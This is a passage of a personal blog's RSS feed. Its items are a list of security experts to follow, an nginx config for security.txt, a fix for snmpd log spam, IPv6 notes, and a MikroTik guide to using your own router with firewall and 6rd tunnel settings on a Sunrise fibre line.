  3235.    <title>Top 21 Security Experts to follow on Twitter in 2021</title>
  3236.    <link></link>
  3237.    <guid isPermaLink="true"></guid>
  3238.    <dc:creator>Andreas Jaggi</dc:creator>
  3239.    <creativeCommons:license></creativeCommons:license>
  3240.    <pubDate>Sat, 17 Apr 2021 06:58:00 +0200</pubDate>
  3241.    <category domain="">Networking</category>
  3242.    <description><![CDATA[<p>From the <a href="" title="Top-21 Cybersecurity Experts You Must Follow on Twitter in 2021 - Security Boulevard (">article on Security Boulevard</a>.</p>
  3243. <ol>
  3244. <li><a href="" title="Rafay Baloch (@rafaybaloch) / Twitter">Rafay Baloch</a></li>
  3245. <li><a href="" title="Troy Hunt (@troyhunt) / Twitter">Troy Hunt</a></li>
  3246. <li><a href="" title="Kevin Mitnick (@kevinmitnick) / Twitter">Kevin Mitnick</a></li>
  3247. <li><a href="" title="Rachel Tobac (@RachelTobac) / Twitter">Rachel Tobac</a></li>
  3248. <li><a href="" title="Mikko Hyppönen (@mikko) / Twitter">Mikko Hyppönen</a></li>
  3249. <li><a href="" title="Katie Moussouris (@k8em0) / Twitter">Katie Moussouris</a></li>
  3250. <li><a href="" title="Bruce Schneier (@schneierblog) / Twitter">Bruce Schneier</a></li>
  3251. <li><a href="" title="Brian Krebs (@briankrebs) / Twitter">Brian Krebs</a></li>
  3252. <li><a href="" title="Jeremiah Grossman (@jeremiahg) / Twitter">Jeremiah Grossman</a></li>
  3253. <li><a href="" title="Eugene Kaspersky (@e_kaspersky) / Twitter">Eugene Kaspersky</a></li>
  3254. <li><a href="" title="Dan Lohemann (@govcso) / Twitter">Dan Lohemann</a></li>
  3255. <li><a href="" title="Steve Morgan (@CybersecuritySF) / Twitter">Steve Morgan</a></li>
  3256. <li><a href="" title="Tyler Cohen Wood (@TylerCohenWood) / Twitter">Tyler Cohen Wood</a></li>
  3257. <li><a href="" title="Graham Cluley (@gcluley) / Twitter">Graham Cluley</a></li>
  3258. <li><a href="" title="Theresa Payton (@TrackerPayton) / Twitter">Theresa Payton</a></li>
  3259. <li><a href="" title="Shira Rubinoff (@Shirastweet) / Twitter">Shira Rubinoff</a></li>
  3260. <li><a href="" title="Eva Galperin (@evacide) / Twitter">Eva Galperin</a></li>
  3261. <li><a href="" title="Marcus J. Carey (@marcusjcarey) / Twitter">Marcus J. Carey</a></li>
  3262. <li><a href="" title="Jayson E Street (@jaysonstreet) / Twitter">Jayson E Street</a></li>
  3263. <li><a href="" title="Paul Asadoorian (@securityweekly) / Twitter">Paul Asadoorian</a></li>
  3264. <li><a href="" title="Adam K. Levin (@adam_k_levin) / Twitter">Adam K. Levin</a></li>
  3265. </ol>
  3266. ]]></description>
  3267.    <content:encoded><![CDATA[<p>From the <a href="" title="Top-21 Cybersecurity Experts You Must Follow on Twitter in 2021 - Security Boulevard (">article on Security Boulevard</a>.</p>
  3268. <ol>
  3269. <li><a href="" title="Rafay Baloch (@rafaybaloch) / Twitter">Rafay Baloch</a></li>
  3270. <li><a href="" title="Troy Hunt (@troyhunt) / Twitter">Troy Hunt</a></li>
  3271. <li><a href="" title="Kevin Mitnick (@kevinmitnick) / Twitter">Kevin Mitnick</a></li>
  3272. <li><a href="" title="Rachel Tobac (@RachelTobac) / Twitter">Rachel Tobac</a></li>
  3273. <li><a href="" title="Mikko Hyppönen (@mikko) / Twitter">Mikko Hyppönen</a></li>
  3274. <li><a href="" title="Katie Moussouris (@k8em0) / Twitter">Katie Moussouris</a></li>
  3275. <li><a href="" title="Bruce Schneier (@schneierblog) / Twitter">Bruce Schneier</a></li>
  3276. <li><a href="" title="Brian Krebs (@briankrebs) / Twitter">Brian Krebs</a></li>
  3277. <li><a href="" title="Jeremiah Grossman (@jeremiahg) / Twitter">Jeremiah Grossman</a></li>
  3278. <li><a href="" title="Eugene Kaspersky (@e_kaspersky) / Twitter">Eugene Kaspersky</a></li>
  3279. <li><a href="" title="Dan Lohemann (@govcso) / Twitter">Dan Lohemann</a></li>
  3280. <li><a href="" title="Steve Morgan (@CybersecuritySF) / Twitter">Steve Morgan</a></li>
  3281. <li><a href="" title="Tyler Cohen Wood (@TylerCohenWood) / Twitter">Tyler Cohen Wood</a></li>
  3282. <li><a href="" title="Graham Cluley (@gcluley) / Twitter">Graham Cluley</a></li>
  3283. <li><a href="" title="Theresa Payton (@TrackerPayton) / Twitter">Theresa Payton</a></li>
  3284. <li><a href="" title="Shira Rubinoff (@Shirastweet) / Twitter">Shira Rubinoff</a></li>
  3285. <li><a href="" title="Eva Galperin (@evacide) / Twitter">Eva Galperin</a></li>
  3286. <li><a href="" title="Marcus J. Carey (@marcusjcarey) / Twitter">Marcus J. Carey</a></li>
  3287. <li><a href="" title="Jayson E Street (@jaysonstreet) / Twitter">Jayson E Street</a></li>
  3288. <li><a href="" title="Paul Asadoorian (@securityweekly) / Twitter">Paul Asadoorian</a></li>
  3289. <li><a href="" title="Adam K. Levin (@adam_k_levin) / Twitter">Adam K. Levin</a></li>
  3290. </ol>
  3291. ]]></content:encoded>
  3292.  </item>
  3294.  <item>
  3295.    <title>security.txt</title>
  3296.    <link></link>
  3297.    <guid isPermaLink="true"></guid>
  3298.    <dc:creator>Andreas Jaggi</dc:creator>
  3299.    <creativeCommons:license></creativeCommons:license>
  3300.    <pubDate>Sun, 28 Mar 2021 08:16:00 +0200</pubDate>
  3301.    <category domain="">Webdesign</category>
  3302.    <description><![CDATA[<p>This website now also serves a <a href="" title="security.txt: Proposed standard for defining security policies">security.txt</a> file which is a standardized way of making security contact information available. (<a href="" title="security.txt - Wikipedia">Wikipedia</a>)</p>
  3303. <p>The file is available in two locations <a href="">/security.txt</a> (the classic location) and <a href="">/.well-known/security.txt</a> (the standard location following RFC8615).</p>
  3305. <p>To easily add the file on all my domains, I'm using the following nginx config snippet.</p>
  3306. <pre>location /security.txt {
  3307. add_header Content-Type 'text/plain';
  3308. add_header Cache-Control 'no-cache, no-store, must-revalidate';
  3309. add_header Pragma 'no-cache';
  3310. add_header Expires '0';
  3311. add_header Vary '*';
  3312. return 200 "Contact:\nExpires: Tue, 19 Jan 2038 03:14:07 +0000\nEncryption:\n";
  3313. }
  3315. location /.well-known/security.txt {
  3316. add_header Content-Type 'text/plain';
  3317. add_header Cache-Control 'no-cache, no-store, must-revalidate';
  3318. add_header Pragma 'no-cache';
  3319. add_header Expires '0';
  3320. add_header Vary '*';
  3321. return 200 "Contact:\nExpires: Tue, 19 Jan 2038 03:14:07 +0000\nEncryption:\n";
  3322. }</pre>
  3324. <p>This snippet is stored in a dedicated file (/etc/nginx/conf_includes/securitytxt) and is included in the various server config blocks like this:</p>
  3325. <pre>server {
  3326. server_name;
  3328. include /etc/nginx/conf_includes/securitytxt;
  3330. location / {
  3331. # rest of website
  3332. }
  3333. }</pre>
  3334. ]]></description>
  3335.    <content:encoded><![CDATA[<p>This website now also serves a <a href="" title="security.txt: Proposed standard for defining security policies">security.txt</a> file which is a standardized way of making security contact information available. (<a href="" title="security.txt - Wikipedia">Wikipedia</a>)</p>
  3336. <p>The file is available in two locations <a href="">/security.txt</a> (the classic location) and <a href="">/.well-known/security.txt</a> (the standard location following RFC8615).</p>
  3338. <p>To easily add the file on all my domains, I'm using the following nginx config snippet.</p>
  3339. <pre>location /security.txt {
  3340. add_header Content-Type 'text/plain';
  3341. add_header Cache-Control 'no-cache, no-store, must-revalidate';
  3342. add_header Pragma 'no-cache';
  3343. add_header Expires '0';
  3344. add_header Vary '*';
  3345. return 200 "Contact:\nExpires: Tue, 19 Jan 2038 03:14:07 +0000\nEncryption:\n";
  3346. }
  3348. location /.well-known/security.txt {
  3349. add_header Content-Type 'text/plain';
  3350. add_header Cache-Control 'no-cache, no-store, must-revalidate';
  3351. add_header Pragma 'no-cache';
  3352. add_header Expires '0';
  3353. add_header Vary '*';
  3354. return 200 "Contact:\nExpires: Tue, 19 Jan 2038 03:14:07 +0000\nEncryption:\n";
  3355. }</pre>
  3357. <p>This snippet is stored in a dedicated file (/etc/nginx/conf_includes/securitytxt) and is included in the various server config blocks like this:</p>
  3358. <pre>server {
  3359. server_name;
  3361. include /etc/nginx/conf_includes/securitytxt;
  3363. location / {
  3364. # rest of website
  3365. }
  3366. }</pre>
  3367. ]]></content:encoded>
  3368.  </item>
  3370.  <item>
  3371.    <title>Fixing 'snmpd[19784]: error on subcontainer 'ia_addr' insert (-1)' messages</title>
  3372.    <link></link>
  3373.    <guid isPermaLink="true"></guid>
  3374.    <dc:creator>Andreas Jaggi</dc:creator>
  3375.    <creativeCommons:license></creativeCommons:license>
  3376.    <pubDate>Sat, 13 Feb 2021 08:57:00 +0100</pubDate>
  3377.    <category domain="">Linux</category>
  3378.    <description><![CDATA[<p>The default configuration of snmpd on Debian has debug level logging enabled and thus we end up with a constant flood of these messages in /var/log/syslog</p>
  3379. <pre>snmpd[19784]: error on subcontainer 'ia_addr' insert (-1)</pre>
  3380. <p>The fix is to lower the logging level, which can be accomplished like this on systems with systemd:</p>
  3381. <pre>cp /lib/systemd/system/snmpd.service /etc/systemd/system/snmpd.service
  3382. sed -i 's/Lsd/LS6d/' /etc/systemd/system/snmpd.service
  3383. systemctl daemon-reload
  3384. systemctl restart snmpd</pre>
  3385. <p>On systems without systemd, the logging level is set by the init script (unless explicitly configured in /etc/default/snmpd), and can be changed like this:</p>
  3386. <pre>sed -i 's/Lsd/LS6d/g' /etc/default/snmpd
  3387. sed -i 's/Lsd/LS6d/g' /etc/init.d/snmpd
  3388. service snmpd restart</pre>
  3389. ]]></description>
  3390.    <content:encoded><![CDATA[<p>The default configuration of snmpd on Debian has debug level logging enabled and thus we end up with a constant flood of these messages in /var/log/syslog</p>
  3391. <pre>snmpd[19784]: error on subcontainer 'ia_addr' insert (-1)</pre>
  3392. <p>The fix is to lower the logging level, which can be accomplished like this on systems with systemd:</p>
  3393. <pre>cp /lib/systemd/system/snmpd.service /etc/systemd/system/snmpd.service
  3394. sed -i 's/Lsd/LS6d/' /etc/systemd/system/snmpd.service
  3395. systemctl daemon-reload
  3396. systemctl restart snmpd</pre>
  3397. <p>On systems without systemd, the logging level is set by the init script (unless explicitly configured in /etc/default/snmpd), and can be changed like this:</p>
  3398. <pre>sed -i 's/Lsd/LS6d/g' /etc/default/snmpd
  3399. sed -i 's/Lsd/LS6d/g' /etc/init.d/snmpd
  3400. service snmpd restart</pre>
  3401. ]]></content:encoded>
  3402.  </item>
  3404.  <item>
  3405.    <title>Embracing the future with SolNet</title>
  3406.    <link></link>
  3407.    <guid isPermaLink="true"></guid>
  3408.    <dc:creator>Andreas Jaggi</dc:creator>
  3409.    <creativeCommons:license></creativeCommons:license>
  3410.    <pubDate>Thu, 04 Feb 2021 10:01:00 +0100</pubDate>
  3411.    <category domain="">Networking</category>
  3412.    <description><![CDATA[<p>This was the initial state of my new <a href="" title="SolNet - Internet &amp; Solution Provider">SolNet</a> fibre connection:</p>
  3413. <p><img src="" alt="SolNet connection with native IPv6 but no IPv4" width="487" height="61"></p>
  3414. <p>As I am a proponent of IPv6 this made me very happy, but unfortunately about 20% of my daily websites only offer <a href="">legacy Internet</a> (which later on I got working as well).</p>
  3415. ]]></description>
  3416.    <content:encoded><![CDATA[<p>This was the initial state of my new <a href="" title="SolNet - Internet &amp; Solution Provider">SolNet</a> fibre connection:</p>
  3417. <p><img src="" alt="SolNet connection with native IPv6 but no IPv4" width="487" height="61"></p>
  3418. <p>As I am a proponent of IPv6 this made me very happy, but unfortunately about 20% of my daily websites only offer <a href="">legacy Internet</a> (which later on I got working as well).</p>
  3419. ]]></content:encoded>
  3420.  </item>
  3422.  <item>
  3423.    <title>Prozentrechnen ist schwer</title>
  3424.    <link></link>
  3425.    <guid isPermaLink="true"></guid>
  3426.    <dc:creator>Andreas Jaggi</dc:creator>
  3427.    <creativeCommons:license></creativeCommons:license>
  3428.    <pubDate>Thu, 04 Feb 2021 08:20:00 +0100</pubDate>
  3429.    <category domain="">Misc</category>
  3430.    <description><![CDATA[<p><a href="" title="True Wealth - Swiss Online Wealth Management">TrueWealth</a> hat's nicht so mit Prozentrechnen:</p>
  3431. <p><img src="" title="6 + 33 + 3 + 12 + 47 = ?" alt="6 + 33 + 3 + 12 + 47 = ?" width="335" height="196"></p>
  3432. ]]></description>
  3433.    <content:encoded><![CDATA[<p><a href="" title="True Wealth - Swiss Online Wealth Management">TrueWealth</a> hat's nicht so mit Prozentrechnen:</p>
  3434. <p><img src="" title="6 + 33 + 3 + 12 + 47 = ?" alt="6 + 33 + 3 + 12 + 47 = ?" width="335" height="196"></p>
  3435. ]]></content:encoded>
  3436.  </item>
  3438.  <item>
  3439.    <title>Using your own router on a Sunrise fiber line</title>
  3440.    <link></link>
  3441.    <guid isPermaLink="true"></guid>
  3442.    <dc:creator>Andreas Jaggi</dc:creator>
  3443.    <creativeCommons:license></creativeCommons:license>
  3444.    <pubDate>Sat, 05 Dec 2020 22:26:00 +0100</pubDate>
  3445.    <category domain="">Networking</category>
  3446.    <description><![CDATA[<p>Sunrise does not like when people run their own router on a fiber line. While they do not directly forbid it, they don't provide any of the required configuration parameters which makes it quite hard to use your own router.</p>
  3447. <p>Below you'll find the required configuration parameters to make your own router connect with IPv4 and IPv6 on a Sunrise fiber line.<br>Beware though that especially the VLAN configuration might be different depending on your city, the following worked for me in Zürich.</p>
  3448. <p>Also, please note that I do not recommend Sunrise as Internet provider (as a matter of fact I'm on the way out of their contract and switching to <a href="" title="SolNet">SolNet</a>).<br>Besides not supporting to bring your own router, they also like to make up additional early-termination fees (the contract states 100CHF early termination fees, but once you call them to initiate the process they tell you that it's gonna cost 300CHF as they decided to change their pricing structure unilaterally).</p>
  3450. <p>Enough of the ranting, now to the interesting part :-)</p>
  3452. <p>The Sunrise line has multiple VLANs to differentiate between Internet, Phone and TV services.<br>To receive an IPv4 address it requires a special value for the Client Identifier DHCP option.<br>For IPv6 <a href="" title="IPv6 rapid deployment">6rd</a> is employed, for which we need to know the prefix and gateway address.</p>
  3454. <p>The following configuration was tested with a <a href="" title="MikroTik Routers and Wireless">MikroTik</a> CRS125 router starting from the default settings.<br>For simplicity I've named the network interfaces according to their intended usage (eg. <code>LAN</code>, <code>sunrise</code> and <code>6rd</code>).</p>
  3456. <p>The first step is to configure the VLAN on top of your fiber interface. In my case it was VLAN ID 131, others were also successful with VLAN ID 10.</p>
  3458. <pre>/interface vlan add interface=sfp1-gateway name=sunrise vlan-id=131</pre>
  3460. <p>Next let's put in place some basic firewall rules to make sure we're not exposing our LAN to the Internet once the connection comes up.</p>
  3461. <pre>/ip firewall filter
  3462. add action=accept chain=forward connection-state=established,related
  3463. add action=accept chain=forward in-interface=LAN out-interface=sunrise
  3464. add action=drop chain=forward
  3465. add action=accept chain=input connection-state=established,related
  3466. add action=accept chain=input protocol=icmp
  3467. add action=drop chain=input in-interface=!LAN</pre>
  3468. <pre>/ip firewall nat
  3469. add action=masquerade chain=srcnat out-interface=sunrise</pre>
  3471. <p>Now we can configure the special value for the Client Identifier DHCP option and configure the DHCP client on the VLAN interface.</p>
  3472. <pre>/ip dhcp-client option add code=61 name=clientid-sunrise value="',Fast5360-sunrise'"</pre>
  3473. <pre>/ip dhcp-client add dhcp-options=clientid-sunrise disabled=no interface=sunrise</pre>
  3475. <p>This should now give us IPv4 Internet connectivity. We can test this by checking that we received an IPv4 address, have an IPv4 default route and that we can ping a host in the Internet.</p>
  3477. <pre>/ip dhcp-client print
  3478. Flags: X - disabled, I - invalid, D - dynamic
  3480. 0   sunrise         yes          yes               bound</pre>
  3481. <pre>/ip route check 1.1
  3482.     status: ok
  3483.  interface: sunrise
  3484.    nexthop:</pre>
  3485. <pre>/ping count=1 1.1
  3486.  SEQ HOST                                     SIZE TTL TIME  STATUS
  3487.    0                                    56  59 1ms
  3488.    sent=1 received=1 packet-loss=0% min-rtt=1ms avg-rtt=1ms max-rtt=1ms</pre>
  3490. <p>Sunrise doesn't offer native IPv6 connectivity but employs 6rd (which defines how to create a 6to4 tunnel based on the public IPv4 address, an IPv6 prefix and the tunnel gateway).</p>
  3491. <p>Before we setup the 6rd tunnel, it's important to put in place firewall rules for IPv6 as afterwards all devices on the local network will receive a public IPv6 address.</p>
  3492. <pre>/ipv6 firewall filter
  3493. add action=accept chain=forward connection-state=established,related
  3494. add action=accept chain=forward in-interface=LAN
  3495. add action=drop chain=forward
  3496. add action=accept chain=input connection-state=established,related
  3497. add action=accept chain=input protocol=icmpv6
  3498. add action=drop chain=input</pre>
  3500. <p>To setup the 6rd tunnel, I've modified an existing script with the specific parameters for Sunrise (namely the <kbd>2001:1710::/28</kbd> prefix and the <kbd></kbd> tunnel gateway address).<br>The script creates the tunnel interface, configures an IPv6 address on the external interface, configures an IPv6 address on the internal interface (which also enables SLAAC to provide IPv6 addresses to the clients on the local network) and configures an IPv6 default route over the 6rd tunnel.</p>
  3501. <p>The script itself will be run via the scheduler, thus let's save it under the name <kbd>6rd-script</kbd>.</p>
  3502. <pre>
  3503. :global ipv6localinterface "LAN"
  3504. :global uplinkinterface "sunrise"
  3506. :global IPv4addr [/ip address get [find interface=$uplinkinterface] address];
  3507. :global IPv4addr [:pick $IPv4addr 0 [:find $IPv4addr "/"]]
  3508. :global IPv4addr2 [:pick $IPv4addr 0 30]
  3509. :global IPv6temp [:toip6 ("1::" . $IPv4addr2)]
  3511. :global IPv4hex1 [:pick $IPv6temp 3 4]
  3512. :global IPv4hex2 [:pick $IPv6temp 4 7]
  3513. :global IPv4hex3 [:pick $IPv6temp 8 9]
  3514. :global IPv4hex4 [:pick $IPv6temp 9 12]
  3515. :global IPv6addr [("2001:171" . $IPv4hex1 . ":". $IPv4hex2 .$IPv4hex3 . ":" . $IPv4hex4 . "0::1/64")]
  3516. :global IPv6addrLoc [("2001:171" . $IPv4hex1 . ":". $IPv4hex2 . $IPv4hex3 . ":" . $IPv4hex4 . "1::1/64")]
  3518. #6to4 interface
  3519. :global 6to4id [/interface 6to4 find where name="6rd"]
  3520. :if ($6to4id!="") do={
  3521. :global 6to4addr [/interface 6to4 get $6to4id local-address]
  3522. if ($6to4addr != $IPv4addr) do={ :log warning "Updating local-address for 6to4 tunnel '6rd' from '$6to4addr' to '$IPv4addr'."; /interface 6to4 set [find name="6rd"] local-address=$IPv4addr }
  3523. } else { :log warning "Creating 6to4 interface '6rd'. "; /interface 6to4 add !keepalive local-address=$IPv4addr mtu=1480 name="6rd" remote-address= }
  3525. #ipv6 for uplink
  3526. :global IPv6addrnumber [/ipv6 address find where comment="6rd" and interface="6rd"]
  3527. :if ($IPv6addrnumber!="") do={
  3528. :global oldip ([/ipv6 address get $IPv6addrnumber address])
  3529. if ($oldip != $IPv6addr) do={ :log warning "Updating 6rd IPv6 from '$oldip' to '$IPv6addr'."; /ipv6 address set number=$IPv6addrnumber address=$IPv6addr disabled=no }
  3530. } else {:log warning "Setting up 6rd IPv6 '$IPv6addr' to '6rd'. "; /ipv6 address add address=$IPv6addr interface="6rd" comment="6rd" advertise=no }
  3532. #ipv6 for local
  3533. :global IPv6addrnumberLocal [/ipv6 address find where comment=("6rd_local") and interface=$ipv6localinterface]
  3534. :if ($IPv6addrnumberLocal!="") do={
  3535. :global oldip ([/ipv6 address get $IPv6addrnumberLocal address])
  3536. if ($oldip != $IPv6addrLoc) do={ :log warning "Updating 6rd LOCAL IPv6 from '$oldip' to '$IPv6addrLoc'."; /ipv6 address set number=$IPv6addrnumberLocal address=$IPv6addrLoc disabled=no }
  3537. } else {:log warning "Setting up 6rd LOCAL IPv6 '$IPv6addrLoc' na '$ipv6localinterface'. "; /ipv6 address add address=$IPv6addrLoc interface=$ipv6localinterface comment="6rd_local" advertise=yes }
  3539. #ipv6 route
  3540. :global routa [/ipv6 route find where dst-address="2000::/3" and gateway="6rd"]
  3541. if ($routa="") do={ :log warning "Setting IPv6 route '2000::/3' pres '6rd'. "; /ipv6 route add distance=1 dst-address="2000::/3" gateway="6rd" }
  3542. </pre>
  3544. <p>Once we've added the script we also need to create the scheduler entry to run it periodically (as it needs to re-configure the tunnel and addresses whenever the public IPv4 address changes).</p>
  3545. <pre>/system scheduler add interval=1m name=schedule1 on-event=6rd-script</pre>
  3547. <p>After the first run of the script we should now have IPv6 connectivity. Let's test this again by checking that we have a public IPv6 address, an IPv6 default route and can ping an IPv6 host in the Internet.</p>
  3549. <pre>/ipv6 address print where interface=6rd and global
  3550. Flags: X - disabled, I - invalid, D - dynamic, G - global, L - link-local
  3551. #    ADDRESS                                     FROM-POOL INTERFACE        ADVERTISE
  3552. 0  G ;;; 6rd
  3553.      2001:171c:6336:47b0::1/64                             6rd              no</pre>
  3554. <pre>/ipv6 route check 2600::
  3555.     status: ok
  3556.  interface: 6rd
  3557.    nexthop: 2600::</pre>
  3558. <pre>/ping count=1 2600::
  3559.  SEQ HOST                                     SIZE TTL TIME  STATUS
  3560.    0 2600::                                     56  50 118ms echo reply
  3561.    sent=1 received=1 packet-loss=0% min-rtt=118ms avg-rtt=118ms max-rtt=118ms</pre>
  3563. <p>And that's how you can configure and validate IPv4 and IPv6 connectivity with your own router on a Sunrise fiber line despite them not liking it very much ;-)</p>
  3564. ]]></description>
  3565.    <content:encoded><![CDATA[<p>Sunrise does not like when people run their own router on a fiber line. While they do not directly forbid it, they don't provide any of the required configuration parameters which makes it quite hard to use your own router.</p>
  3566. <p>Below you'll find the required configuration parameters to make your own router connect with IPv4 and IPv6 on a Sunrise fiber line.<br>Beware though that especially the VLAN configuration might be different depending on your city, the following worked for me in Zürich.</p>
  3567. <p>Also, please note that I do not recommend Sunrise as Internet provider (as a matter of fact I'm on the way out of their contract and switching to <a href="" title="SolNet">SolNet</a>).<br>Besides not supporting to bring your own router, they also like to make up additional early-termination fees (the contract states 100CHF early termination fees, but once you call them to initiate the process they tell you that it's gonna cost 300CHF as they decided to change their pricing structure unilaterally).</p>
  3569. <p>Enough of the ranting, now to the interesting part :-)</p>
  3571. <p>The Sunrise line has multiple VLANs to differentiate between Internet, Phone and TV services.<br>To receive an IPv4 address it requires a special value for the Client Identifier DHCP option.<br>For IPv6 <a href="" title="IPv6 rapid deployment">6rd</a> is employed, for which we need to know the prefix and gateway address.</p>
  3573. <p>The following configuration was tested with a <a href="" title="MikroTik Routers and Wireless">MikroTik</a> CRS125 router starting from the default settings.<br>For simplicity I've named the network interfaces according to their intended usage (eg. <code>LAN</code>, <code>sunrise</code> and <code>6rd</code>).</p>
  3575. <p>The first step is to configure the VLAN on top of your fiber interface. In my case it was VLAN ID 131, others were also successful with VLAN ID 10.</p>
  3577. <pre>/interface vlan add interface=sfp1-gateway name=sunrise vlan-id=131</pre>
  3579. <p>Next let's put in place some basic firewall rules to make sure we're not exposing our LAN to the Internet once the connection comes up.</p>
  3580. <pre>/ip firewall filter
  3581. add action=accept chain=forward connection-state=established,related
  3582. add action=accept chain=forward in-interface=LAN out-interface=sunrise
  3583. add action=drop chain=forward
  3584. add action=accept chain=input connection-state=established,related
  3585. add action=accept chain=input protocol=icmp
  3586. add action=drop chain=input in-interface=!LAN</pre>
  3587. <pre>/ip firewall nat
  3588. add action=masquerade chain=srcnat out-interface=sunrise</pre>
  3590. <p>Now we can configure the special value for the Client Identifier DHCP option and configure the DHCP client on the VLAN interface.</p>
  3591. <pre>/ip dhcp-client option add code=61 name=clientid-sunrise value="',Fast5360-sunrise'"</pre>
  3592. <pre>/ip dhcp-client add dhcp-options=clientid-sunrise disabled=no interface=sunrise</pre>
  3594. <p>This should now give us IPv4 Internet connectivity. We can test this by checking that we received an IPv4 address, have an IPv4 default route and that we can ping a host in the Internet.</p>
  3596. <pre>/ip dhcp-client print
  3597. Flags: X - disabled, I - invalid, D - dynamic
  3599. 0   sunrise         yes          yes               bound</pre>
  3600. <pre>/ip route check 1.1
  3601.     status: ok
  3602.  interface: sunrise
  3603.    nexthop:</pre>
  3604. <pre>/ping count=1 1.1
  3605.  SEQ HOST                                     SIZE TTL TIME  STATUS
  3606.    0                                    56  59 1ms
  3607.    sent=1 received=1 packet-loss=0% min-rtt=1ms avg-rtt=1ms max-rtt=1ms</pre>
  3609. <p>Sunrise doesn't offer native IPv6 connectivity but employs 6rd (which defines how to create a 6to4 tunnel based on the public IPv4 address, an IPv6 prefix and the tunnel gateway).</p>
  3610. <p>Before we setup the 6rd tunnel, it's important to put in place firewall rules for IPv6 as afterwards all devices on the local network will receive a public IPv6 address.</p>
  3611. <pre>/ipv6 firewall filter
  3612. add action=accept chain=forward connection-state=established,related
  3613. add action=accept chain=forward in-interface=LAN
  3614. add action=drop chain=forward
  3615. add action=accept chain=input connection-state=established,related
  3616. add action=accept chain=input protocol=icmpv6
  3617. add action=drop chain=input</pre>
  3619. <p>To setup the 6rd tunnel, I've modified an existing script with the specific parameters for Sunrise (namely the <kbd>2001:1710::/28</kbd> prefix and the <kbd></kbd> tunnel gateway address).<br>The script creates the tunnel interface, configures an IPv6 address on the external interface, configures an IPv6 address on the internal interface (which also enables SLAAC to provide IPv6 addresses to the clients on the local network) and configures an IPv6 default route over the 6rd tunnel.</p>
  3620. <p>The script itself will be run via the scheduler, thus let's save it under the name <kbd>6rd-script</kbd>.</p>
  3621. <pre>
  3622. :global ipv6localinterface "LAN"
  3623. :global uplinkinterface "sunrise"
  3625. :global IPv4addr [/ip address get [find interface=$uplinkinterface] address];
  3626. :global IPv4addr [:pick $IPv4addr 0 [:find $IPv4addr "/"]]
  3627. :global IPv4addr2 [:pick $IPv4addr 0 30]
  3628. :global IPv6temp [:toip6 ("1::" . $IPv4addr2)]
  3630. :global IPv4hex1 [:pick $IPv6temp 3 4]
  3631. :global IPv4hex2 [:pick $IPv6temp 4 7]
  3632. :global IPv4hex3 [:pick $IPv6temp 8 9]
  3633. :global IPv4hex4 [:pick $IPv6temp 9 12]
  3634. :global IPv6addr [("2001:171" . $IPv4hex1 . ":". $IPv4hex2 .$IPv4hex3 . ":" . $IPv4hex4 . "0::1/64")]
  3635. :global IPv6addrLoc [("2001:171" . $IPv4hex1 . ":". $IPv4hex2 . $IPv4hex3 . ":" . $IPv4hex4 . "1::1/64")]
  3637. #6to4 interface
  3638. :global 6to4id [/interface 6to4 find where name="6rd"]
  3639. :if ($6to4id!="") do={
  3640. :global 6to4addr [/interface 6to4 get $6to4id local-address]
  3641. if ($6to4addr != $IPv4addr) do={ :log warning "Updating local-address for 6to4 tunnel '6rd' from '$6to4addr' to '$IPv4addr'."; /interface 6to4 set [find name="6rd"] local-address=$IPv4addr }
  3642. } else { :log warning "Creating 6to4 interface '6rd'. "; /interface 6to4 add !keepalive local-address=$IPv4addr mtu=1480 name="6rd" remote-address= }
  3644. #ipv6 for uplink
  3645. :global IPv6addrnumber [/ipv6 address find where comment="6rd" and interface="6rd"]
  3646. :if ($IPv6addrnumber!="") do={
  3647. :global oldip ([/ipv6 address get $IPv6addrnumber address])
  3648. if ($oldip != $IPv6addr) do={ :log warning "Updating 6rd IPv6 from '$oldip' to '$IPv6addr'."; /ipv6 address set number=$IPv6addrnumber address=$IPv6addr disabled=no }
  3649. } else {:log warning "Setting up 6rd IPv6 '$IPv6addr' to '6rd'. "; /ipv6 address add address=$IPv6addr interface="6rd" comment="6rd" advertise=no }
  3651. #ipv6 for local
  3652. :global IPv6addrnumberLocal [/ipv6 address find where comment=("6rd_local") and interface=$ipv6localinterface]
  3653. :if ($IPv6addrnumberLocal!="") do={
  3654. :global oldip ([/ipv6 address get $IPv6addrnumberLocal address])
  3655. if ($oldip != $IPv6addrLoc) do={ :log warning "Updating 6rd LOCAL IPv6 from '$oldip' to '$IPv6addrLoc'."; /ipv6 address set number=$IPv6addrnumberLocal address=$IPv6addrLoc disabled=no }
  3656. } else {:log warning "Setting up 6rd LOCAL IPv6 '$IPv6addrLoc' na '$ipv6localinterface'. "; /ipv6 address add address=$IPv6addrLoc interface=$ipv6localinterface comment="6rd_local" advertise=yes }
  3658. #ipv6 route
  3659. :global routa [/ipv6 route find where dst-address="2000::/3" and gateway="6rd"]
  3660. if ($routa="") do={ :log warning "Setting IPv6 route '2000::/3' pres '6rd'. "; /ipv6 route add distance=1 dst-address="2000::/3" gateway="6rd" }
  3661. </pre>
  3663. <p>Once we've added the script we also need to create the scheduler entry to run it periodically (as it needs to re-configure the tunnel and addresses whenever the public IPv4 address changes).</p>
  3664. <pre>/system scheduler add interval=1m name=schedule1 on-event=6rd-script</pre>
  3666. <p>After the first run of the script we should now have IPv6 connectivity. Let's test this again by checking that we have a public IPv6 address, an IPv6 default route and can ping an IPv6 host in the Internet.</p>
  3668. <pre>/ipv6 address print where interface=6rd and global
  3669. Flags: X - disabled, I - invalid, D - dynamic, G - global, L - link-local
  3670. #    ADDRESS                                     FROM-POOL INTERFACE        ADVERTISE
  3671. 0  G ;;; 6rd
  3672.      2001:171c:6336:47b0::1/64                             6rd              no</pre>
  3673. <pre>/ipv6 route check 2600::
  3674.     status: ok
  3675.  interface: 6rd
  3676.    nexthop: 2600::</pre>
  3677. <pre>/ping count=1 2600::
  3678.  SEQ HOST                                     SIZE TTL TIME  STATUS
  3679.    0 2600::                                     56  50 118ms echo reply
  3680.    sent=1 received=1 packet-loss=0% min-rtt=118ms avg-rtt=118ms max-rtt=118ms</pre>
  3682. <p>And that's how you can configure and validate IPv4 and IPv6 connectivity with your own router on a Sunrise fiber line despite them not liking it very much ;-)</p>
  3683. ]]></content:encoded>
  3684.  </item>
  3686.  <item>
  3687.    <title>MTA-STS</title>
  3688.    <link></link>
  3689.    <guid isPermaLink="true"></guid>
  3690.    <dc:creator>Andreas Jaggi</dc:creator>
  3691.    <creativeCommons:license></creativeCommons:license>
  3692.    <pubDate>Sat, 21 Nov 2020 09:47:00 +0100</pubDate>
  3693.    <category domain="">Networking</category>
